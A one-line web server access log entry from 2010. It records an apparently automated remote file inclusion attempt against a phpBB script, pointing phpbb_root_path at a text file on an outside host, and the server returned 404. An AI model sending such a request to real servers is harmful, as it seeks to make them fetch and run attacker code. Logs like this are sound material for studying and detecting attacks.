189.108.172.26 - - [06/May/2010:02:07:00 -0500] "GET /logs//forum/toplist.php?phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
